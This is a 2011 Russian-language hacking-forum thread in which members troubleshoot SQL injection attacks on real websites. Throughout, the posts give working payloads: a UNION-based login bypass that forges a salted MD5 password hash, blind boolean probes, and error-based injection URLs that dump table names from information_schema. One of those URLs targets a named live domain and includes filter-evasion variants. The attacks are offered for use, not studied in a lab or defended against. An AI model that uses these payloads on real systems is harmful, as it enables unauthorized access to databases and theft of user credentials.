25.10.2011, 17:49
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от M1lten
Тоже, ошибки нет, но пишет что не правильный пароль.
Если что, могу кому-то в пм кинуть
Ну тогда примерно понятно, чо.
Знач так. Тащемта возмем за основу:
asd' union select 'pass', 'salt', 1, '1
/via кто-то там
Значит там сравнивается с пассом который ты шлешь. да.
Отсылать на скрипт будем пароль: "1"(без кавычек естественно)
думаю что выглядет в коде это как-то так:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Наш пароль: 1
"Наша" соль: 2
При авторизации пробуй слать:
Код:
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), 2)) , 2, 1, 1 --
Пасс: 1
Или
Код:
//md5(md5(pass).md5(salt))
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(2))) , 2, 1, 1 --
Пасс: 1
И так далее по алгоритмам.
Отчет ждем в тему
|
|
|
25.10.2011, 18:28
|
|
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами:
8105366
Репутация:
0
|
|
Boolean, при запросах такова вида, выскакивает ошибка мускуля, а форма авторизации говорит что не верный пароль. И кстати, мб, пароль не шифруется, т.к. он даже в куках передается в открытом виде
|
|
|
|
25.10.2011, 18:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от M1lten
Boolean
, при запросах такова вида, выскакивает ошибка мускуля, а форма авторизации говорит что не верный пароль. И кстати, мб, пароль не шифруется, т.к. он даже в куках передается в открытом виде
ты все варианты засолки то хоть перепробовал как тебе посоветовали?
Тем не менее, дай ссыль чтоль.
|
|
|
|
25.10.2011, 18:51
|
|
Участник форума
Регистрация: 03.10.2011
Сообщений: 208
С нами:
7689206
Репутация:
0
|
|
Сорри за нубство мужики
Такой вопрос
1,2,..group_concat(login)...
...concat_ws(login)...
не хочет выполнять как можно обойти фильтр?
пробовал
group_concat(CHAR(108,111,103,105,110))
тоже не работает
|
|
|
|
25.10.2011, 19:11
|
|
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами:
8105366
Репутация:
0
|
|
Сообщение от попугай
ты все варианты засолки то хоть перепробовал как тебе посоветовали?
Тем не менее, дай ссыль чтоль.
Вот, при таком запросе нет ошибки мускуля, и скрипт говорит что неверный пароль:
login = asd
pass = 1
Сообщение от None
asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(MD5(2)))) , 2, 1, 1 --
И при таком тоже ошибка пропадает и неверный пароль
Сообщение от None
asd' and 1=2 union select MD5(CONCAT(1, MD5(2))) , 2, 1, 1 --
Если не получится, скину.
|
|
|
|
25.10.2011, 20:18
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от crackforme
Сорри за нубство мужики
Такой вопрос
1,2,..group_concat(login)...
...concat_ws(login)...
не хочет выполнять как можно обойти фильтр?
пробовал
group_concat(CHAR(108,111,103,105,110))
тоже не работает
http://www.mysql.ru/docs/maryan/#concat_ws
http://webi.ru/webi_articles/8_14_f.html
+ советую к прочтению http://raz0r.name/obzory/group_concat/
|
|
|
|
25.10.2011, 20:36
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
site/news.php?id=18 and 1=1 (true)
site/news.php?id=6+AND+ascii(lower(substring(user(),1,1 )))=111 (true)
site/news.php?id=18 and 1=3 (false)
site/news.php?id=18 and 'a'='a'
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a'='a' LIMIT 0,1' at line 1 в функции view_field select title from news where id=18 and 'a'='a'
в чем суть ошибки? mq вроде бы off |
|
|
|
25.10.2011, 21:19
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?
|
|
|
|
25.10.2011, 21:28
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от qaz
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?
Код:
http://english.in.ua/study.php?id=7/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
|
|
|
|
25.10.2011, 23:45
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от qaz
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?
на самом то деле причина просто в
Сообщение от None
http://english.in.ua/study.php
?id=7+or+1+group+by+concat((select+table_name+from +information_schema.tables
limit 0,1
),floor%28rand(0)*2))having+min(0)+or+1--+
Сообщение от vaddd
site/news.php?id=18 and 1=1 (true)
site/news.php?id=6+AND+ascii(lower(substring(user(),1,1 )))=111 (true)
site/news.php?id=18 and 1=3 (false)
site/news.php?id=18 and 'a'='a'
в чем суть ошибки? mq вроде бы off
д а какая разница то? Юзай hex формат. А вообще можешь кинуть линк в пм, если просто интересно.
To, M1lten
Может банально идёт сверка $_REQUSET['login'] == $sql_resp['login']
$_REQUSET['login'] = sdf' sqlinj, а $sql_resp['login'] = выводимое тобою значение. Залогиниться возможно, когда идёт проверка на кол-во строк, которое вернулось после ввода. Может вообще два запроса на проверку логина и пароля, д дофига чего может быть и скуль не провести. Если ошибка от мускуля, то юзай error-based sqlinj
|
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Комбинированный вид
